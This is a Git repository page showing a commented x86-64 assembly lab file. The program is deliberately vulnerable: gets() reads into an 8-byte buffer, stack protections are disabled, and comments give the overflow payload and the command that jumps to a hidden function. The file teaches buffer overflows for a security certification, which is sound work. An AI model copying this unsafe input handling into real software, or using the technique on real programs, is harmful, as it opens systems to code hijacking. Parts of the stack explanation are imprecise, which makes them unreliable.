bfu
/
bl
2
1
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
bl/bof.s

91 lines
5.8 KiB
ArmAsm
Raw Permalink Blame History

#---------------------------------------------------------------------------------------------------------------#
# description: handwritten program running gets to a buffer of [8] to exemplify a quick and dirty #
# buffer overflow exploit. #
# #
# objectives: SY0-601 1.3, 2.3, 3.2 #
# #
# intended environment: DOCKER - kalilinux/kali-last-release:latest #
# #
# author: bfu #
# file: bof.s #
# binary: bof.elf #
# #
# assembler: GNU Assembler (as or GAS) #
# assemble: as --gstabs+ bof.s -o bof.o #
# link: gcc -no-pie -nostartfiles -z execstack -ggdb -fno-stack-protector bof.o -o bof.elf #
#---------------------------------------------------------------#---------------------------------------------- #
.code64 # not required, but specifying we're 64-bit :) #
#---------------------------------------------------------------#-----------------------------------------------#
# ~ read only data ~ #
.section .rodata #-----------------------------------------------#
money_str: .string "woohoo!! free money\n" # this is the string we're going to print on #
# successful exploitation #
#---------------------------------------------------------------#-----------------------------------------------#
.section .text # ~ text section ~ #
#-----------------------------------------------#
.globl _start # make it known that `_start` is global #
#-----------------------------------------------#
.extern printf # (FROM LIBC) #
.extern gets # printf(char*,...), gets(char*) #
#---------------------------------------------------------------#-----------------------------------------------#
_get_input: # #
push %rbp # void _get_input(void) { #
mov %rsp, %rbp # char ptr[8]; #
sub $0x10, %rsp # gets(ptr); #
lea -0x8(%rbp),%rax # return; #
mov %rax, %rdi # } #
call gets@plt # #
#---------------------------------------------------------------#-----------------------------------------------#
# Knowing that the buffer size is 8 and that there are no protections on this binary, we can overflow the #
# buffer to call a function such as `_get_rich_fast`. This is because the stack also contains a saved base #
# pointer (1) to know where to jump back to at the of the function. After inputting the correct amount of #
# any data, for example, the character 'a' to fill the buffer, the stack looks like this: #
# #
# _______________________________________________________________________ #
# | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | a | b | c | d | e | f | #
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
# | / | / | / | / | / | / | / | / | 61 | 61 | 61 | 61 | 61 | 61 | 61 | 61 | #
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
# | x | x | x | x | x | x | x | x | 63 | 10 | 40 | 00 | <-- saved bp (1) | #
# |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
# #
# Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
# to modify the base pointer, so we know that we want to replace the stored address 0x40116a. However, #
# since the binary is little endian (LSB), when we want to overwrite the memory, our input will have to #
# follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
# be able to write 0x401047 (the address we want to jump to). #
# #
# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x10\x40". #
#---------------------------------------------------------------------------------------------------------------#
# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x10\x40" | ./bof.elf' #
#---------------------------------------------------------------#-----------------------------------------------#
nop # #
leave # END OF FUNCTION #
ret # #
#---------------------------------------------------------------#-----------------------------------------------#
_get_rich_fast: # #
push %rbp # void _get_rich_fast(void) { #
mov %rsp, %rbp # printf(money_str); // .rodata #
lea money_str, %rdi # } #
mov %rdi, %rax # #
call printf@plt #-----------------------------------------------#
# Since this function is not called in the #
#---------------------------------------------------------------# program, the goal is to jump to this #
jmp _bye # function (_get_rich_fast) via overflow. #
#---------------------------------------------------------------#-----------------------------------------------#
_start: # #
push %rbp # push the frame pointer #
call _get_input # call our input retrieving function #
mov $0, %rax # clean up rax #
pop %rbp # cleanup, jump to our exit routine #
jmp _bye # #
#---------------------------------------------------------------#-----------------------------------------------#
_bye: # exit(0) #
mov $60, %al #-----------------------------------------------#
xor %rdi, %rdi # sys_exit = 60 (dec) #
syscall # exit code 0 #
retq # bye bye #
#---------------------------------------------------------------#-----------------------------------------------#
# #
#---------------------------------------------------------------------------------------------------------------#
Reference in New Issue View Git Blame Copy Permalink